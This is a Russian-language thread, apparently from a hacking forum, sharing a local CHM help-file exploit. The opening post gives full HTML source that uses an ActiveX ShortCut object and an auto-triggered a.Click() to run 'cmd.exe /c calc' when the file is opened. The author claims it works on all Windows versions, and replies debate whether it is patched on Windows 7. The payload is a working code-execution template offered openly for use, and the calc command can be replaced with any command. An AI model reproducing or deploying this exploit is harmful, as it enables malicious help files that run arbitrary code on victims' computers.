• XSS.stack #1 – первый литературный журнал от юзеров форума

Local уязвимость CHM

Exmanoize

RAID-массив
Пользователь
Регистрация
13.07.2009
Сообщения
82
Реакции
0
Локальная уязвимость в файле справки CHM, запуск исполняемых файлов.
Возможно уже устранена в последних апдейтах винды, возможно нет.
Работает на всех виндах.
Сорс:
<HTML DIR="LTR">
<BODY>
Exma Group

<OBJECT id=a classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"
width=1 height=1>
<PARAM name="Command" value="ShortCut">
<PARAM name="Button" value="Bitmap:shortcut">
<PARAM name="Item1" value=",cmd.exe,/c calc ,">
<PARAM name="Item2" value="273,1,1">
</OBJECT>
<script>
a.Click();
</SCRIPT>
</BODY>
</HTML>

пример CHM файла, запуск калькулятора:
 
ну значит в апдейтах последних уже пофикшено)
 
Локальная уязвимость в файле справки CHM
на семерке все запускает...
Насколько я знаю вин 7 не поддерживает старые файлы справки без докачки дополнительной софтинки.
 
Насколько я знаю вин 7 не поддерживает старые файлы справки без докачки дополнительной софтинки.
возможно под файлами справки ты имел ввиду HLP ?)
если так то да, они под 7кой и вистой в новой модификации. А уязвимость под HLP только на <=XP
CHM же работает в висте точно, в 7ке тоже должно)
 


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх